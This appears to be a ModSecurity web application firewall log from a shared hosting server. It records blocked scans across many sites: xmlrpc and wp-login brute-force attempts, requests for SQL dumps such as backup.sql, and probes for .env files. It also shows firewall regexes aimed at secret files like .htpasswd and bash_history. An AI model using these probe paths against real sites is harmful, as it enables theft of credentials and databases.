[Tue May 26 18:18:12.888698 2026] [security2:error] [pid 983082:tid 983253] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWi7vhpIlZJOtze4s50wAAAK4"]
[Tue May 26 18:18:13.268492 2026] [security2:error] [pid 983082:tid 983258] [client 34.105.92.25:56481] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWWjLvhpIlZJOtze4s56gAAALM"]
[Tue May 26 18:18:13.779999 2026] [security2:error] [pid 983082:tid 983215] [client 34.105.92.25:56795] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWWjbvhpIlZJOtze4s58QAAAIg"]
[Tue May 26 18:18:14.333716 2026] [security2:error] [pid 983082:tid 983286] [client 34.105.92.25:57062] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWWjbvhpIlZJOtze4s5-wAAAM8"]
[Tue May 26 18:18:14.856002 2026] [security2:error] [pid 983082:tid 983330] [client 34.105.92.25:57403] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWWjrvhpIlZJOtze4s6BwAAAPs"]
[Tue May 26 18:18:15.023279 2026] [security2:error] [pid 983082:tid 983273] [client 34.105.92.25:57676] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWWj7vhpIlZJOtze4s6DwAAAMI"]
[Tue May 26 18:18:15.023394 2026] [security2:error] [pid 983082:tid 983273] [client 34.105.92.25:57676] ModSecurity: Warning. Operator GE matched 2 at IP:dos_burst_counter. [file "/etc/httpd/modsecurity.d/03_asl_dos.conf"] [line "99"] [id "350114"] [rev "1"] [msg "Atomicorp.com WAF Rules: Potential Denial of Service (DoS) Attack from  - # of Request Bursts: 2"] [severity "ERROR"] [tag "no_ar"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWWj7vhpIlZJOtze4s6DwAAAMI"]
[Tue May 26 18:18:15.023419 2026] [security2:error] [pid 983082:tid 983273] [client 34.105.92.25:57676] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWWj7vhpIlZJOtze4s6DwAAAMI"]
[Tue May 26 18:18:15.104139 2026] [security2:error] [pid 983082:tid 983318] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWjbvhpIlZJOtze4s5-gAAAO8"]
[Tue May 26 18:18:19.510000 2026] [security2:error] [pid 983082:tid 983235] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWkbvhpIlZJOtze4s6OwAAAJw"]
[Tue May 26 18:18:20.382211 2026] [security2:error] [pid 983082:tid 983164] [remote 216.73.217.110:52779] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/webhook.php"] [unique_id "ahWWlLvhpIlZJOtze4s6dgAAmFE"]
[Tue May 26 18:18:20.684487 2026] [security2:error] [pid 983082:tid 983238] [client 14.232.174.103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWkrvhpIlZJOtze4s6WwAAAJ8"]
[Tue May 26 18:18:22.160847 2026] [security2:error] [pid 983082:tid 983173] [remote 103.11.102.106:41272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWlbvhpIlZJOtze4s6jwAAuVo"]
[Tue May 26 18:18:22.419041 2026] [security2:error] [pid 983082:tid 983267] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWk7vhpIlZJOtze4s6bAAAALw"]
[Tue May 26 18:18:23.893527 2026] [security2:error] [pid 983082:tid 983212] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWlrvhpIlZJOtze4s6lQAAAIU"]
[Tue May 26 18:18:25.279678 2026] [security2:error] [pid 983082:tid 983234] [client 32.192.74.76:56835] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/1.sql"] [unique_id "ahWWmbvhpIlZJOtze4s63QAAAJs"]
[Tue May 26 18:18:25.798315 2026] [security2:error] [pid 983082:tid 983297] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWmLvhpIlZJOtze4s60wAAANo"]
[Tue May 26 18:18:26.553243 2026] [security2:error] [pid 983082:tid 983230] [client 51.77.74.125:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahWWmrvhpIlZJOtze4s7JwAAAJc"]
[Tue May 26 18:18:27.929159 2026] [security2:error] [pid 983082:tid 983249] [client 32.192.74.76:57008] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/backup.sql"] [unique_id "ahWWm7vhpIlZJOtze4s7SAAAAKo"]
[Tue May 26 18:18:28.700761 2026] [security2:error] [pid 983082:tid 983316] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWm7vhpIlZJOtze4s7OQAAAO0"]
[Tue May 26 18:18:28.745910 2026] [security2:error] [pid 983082:tid 983232] [client 32.192.74.76:57050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/database.sql"] [unique_id "ahWWnLvhpIlZJOtze4s7aQAAAJk"]
[Tue May 26 18:18:29.934275 2026] [security2:error] [pid 983082:tid 983146] [remote 74.7.241.58:58586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWWnbvhpIlZJOtze4s7gwAA8j8"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/en
[Tue May 26 18:18:30.190805 2026] [security2:error] [pid 983082:tid 983144] [remote 67.23.237.2:36334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.237.23.67.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWWnrvhpIlZJOtze4s7hQAAuT0"]
[Tue May 26 18:18:31.350564 2026] [security2:error] [pid 983082:tid 983281] [client 14.191.124.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWWn7vhpIlZJOtze4s7qgAAAMo"], referer: https://www.anujtradingco.com/
[Tue May 26 18:18:31.683477 2026] [security2:error] [pid 983082:tid 983310] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWnrvhpIlZJOtze4s7kQAAAOc"]
[Tue May 26 18:18:32.420977 2026] [security2:error] [pid 983082:tid 983299] [client 14.191.124.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWWoLvhpIlZJOtze4s7vgAAANw"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1451839&
[Tue May 26 18:18:32.479423 2026] [security2:error] [pid 983082:tid 983227] [client 32.192.74.76:57254] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/data.sql"] [unique_id "ahWWoLvhpIlZJOtze4s7vwAAAJQ"]
[Tue May 26 18:18:33.206269 2026] [security2:error] [pid 983082:tid 983162] [remote 103.11.102.106:47120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWobvhpIlZJOtze4s7zAAAuk8"]
[Tue May 26 18:18:33.681886 2026] [security2:error] [pid 983082:tid 983339] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWoLvhpIlZJOtze4s7uwAAAQQ"]
[Tue May 26 18:18:33.986844 2026] [security2:error] [pid 983082:tid 983156] [remote 103.91.67.202:65442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWobvhpIlZJOtze4s72wAAu0k"]
[Tue May 26 18:18:34.459872 2026] [security2:error] [pid 983082:tid 983169] [remote 103.91.67.202:65442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWorvhpIlZJOtze4s76AAAsFY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:18:34.616911 2026] [security2:error] [pid 983082:tid 983311] [client 167.114.139.21:15992] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "krishnawoodworks.com"] [uri "/"] [unique_id "ahWWorvhpIlZJOtze4s77wAAAOg"]
[Tue May 26 18:18:34.617044 2026] [security2:error] [pid 983082:tid 983311] [client 167.114.139.21:15992] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "krishnawoodworks.com"] [uri "/"] [unique_id "ahWWorvhpIlZJOtze4s77wAAAOg"]
[Tue May 26 18:18:35.279960 2026] [security2:error] [pid 983082:tid 983306] [client 14.191.124.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWWo7vhpIlZJOtze4s7_gAAAOM"], referer: https://anujtradingco.com
[Tue May 26 18:18:36.182031 2026] [security2:error] [pid 983082:tid 983269] [client 190.139.187.43:50581] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.187.139.190.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/xmlrpc.php"] [unique_id "ahWWo7vhpIlZJOtze4s8DwAAAL4"]
[Tue May 26 18:18:36.182231 2026] [security2:error] [pid 983082:tid 983269] [client 190.139.187.43:50581] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "rathnaa.co.in"] [uri "/xmlrpc.php"] [unique_id "ahWWo7vhpIlZJOtze4s8DwAAAL4"]
[Tue May 26 18:18:36.342801 2026] [security2:error] [pid 983082:tid 983213] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWo7vhpIlZJOtze4s7-wAAAIY"]
[Tue May 26 18:18:36.636669 2026] [security2:error] [pid 983082:tid 983255] [client 32.192.74.76:57514] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/db_backup.sql"] [unique_id "ahWWpLvhpIlZJOtze4s8HgAAALA"]
[Tue May 26 18:18:37.664488 2026] [security2:error] [pid 983082:tid 983165] [remote 195.250.23.247:36036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWWpbvhpIlZJOtze4s8KwAAn1I"]
[Tue May 26 18:18:37.881797 2026] [security2:error] [pid 983082:tid 983210] [remote 195.250.23.247:36036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWWpbvhpIlZJOtze4s8MgAA4X8"], referer: https://atreegroup.com/wp-login.php
[Tue May 26 18:18:38.510573 2026] [security2:error] [pid 983082:tid 983183] [remote 51.91.98.45:48040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahWWprvhpIlZJOtze4s8PwAA22Q"]
[Tue May 26 18:18:39.005513 2026] [security2:error] [pid 983082:tid 983225] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWpbvhpIlZJOtze4s8NQAAAJI"]
[Tue May 26 18:18:40.002261 2026] [security2:error] [pid 983082:tid 983236] [client 32.192.74.76:57718] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/dbdump.sql"] [unique_id "ahWWp7vhpIlZJOtze4s8YgAAAJ0"]
[Tue May 26 18:18:40.869042 2026] [security2:error] [pid 983082:tid 983220] [client 103.99.37.229:43686] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consultrgb.com"] [uri "/public/.env"] [unique_id "ahWWqLvhpIlZJOtze4s8dQAAAI0"]
[Tue May 26 18:18:40.870647 2026] [security2:error] [pid 983082:tid 983253] [client 103.99.37.229:43724] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consultrgb.com"] [uri "/backend/.env"] [unique_id "ahWWqLvhpIlZJOtze4s8dgAAAK4"]
[Tue May 26 18:18:40.895642 2026] [core:error] [pid 983082:tid 983319] [client 103.99.37.229:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:18:40.895657 2026] [core:error] [pid 983082:tid 983319] [client 103.99.37.229:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:18:41.156143 2026] [security2:error] [pid 983082:tid 983085] [remote 222.165.190.235:45232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWWqLvhpIlZJOtze4s8fQAAwwI"]
[Tue May 26 18:18:41.627530 2026] [security2:error] [pid 983082:tid 983207] [remote 222.165.190.235:45232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWWqbvhpIlZJOtze4s8iwAA6Hw"], referer: https://jhonparra.com/wp-login.php
[Tue May 26 18:18:41.862421 2026] [security2:error] [pid 983082:tid 983132] [remote 78.142.18.172:36262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWqbvhpIlZJOtze4s8jAAAvTE"]
[Tue May 26 18:18:41.951575 2026] [security2:error] [pid 983082:tid 983247] [client 103.99.37.229:43704] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consultrgb.com"] [uri "/www/.env"] [unique_id "ahWWqbvhpIlZJOtze4s8kwAAAKg"]
[Tue May 26 18:18:41.952655 2026] [security2:error] [pid 983082:tid 983226] [client 103.99.37.229:43702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consultrgb.com"] [uri "/.env"] [unique_id "ahWWqbvhpIlZJOtze4s8lAAAAJM"]
[Tue May 26 18:18:42.158859 2026] [security2:error] [pid 983082:tid 983229] [client 32.192.74.76:57853] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/db.sql"] [unique_id "ahWWqrvhpIlZJOtze4s8mwAAAJY"]
[Tue May 26 18:18:42.219105 2026] [security2:error] [pid 983082:tid 983230] [client 172.226.44.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWWqrvhpIlZJOtze4s8lwAAAJc"]
[Tue May 26 18:18:42.453683 2026] [security2:error] [pid 983082:tid 983289] [client 103.99.37.229:43670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consultrgb.com"] [uri "/api/.env"] [unique_id "ahWWqrvhpIlZJOtze4s8ogAAANI"]
[Tue May 26 18:18:43.814101 2026] [security2:error] [pid 983082:tid 983259] [client 103.99.37.229:43678] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consultrgb.com"] [uri "/app/.env"] [unique_id "ahWWq7vhpIlZJOtze4s8xQAAALQ"]
[Tue May 26 18:18:43.817601 2026] [security2:error] [pid 983082:tid 983330] [client 103.99.37.229:43652] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consultrgb.com"] [uri "/storage/.env"] [unique_id "ahWWq7vhpIlZJOtze4s8xgAAAPs"]
[Tue May 26 18:18:44.370183 2026] [security2:error] [pid 983082:tid 983235] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWq7vhpIlZJOtze4s8sQAAAJw"]
[Tue May 26 18:18:45.831203 2026] [security2:error] [pid 983082:tid 983095] [remote 103.230.156.120:33560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWrbvhpIlZJOtze4s87AAA_Qw"]
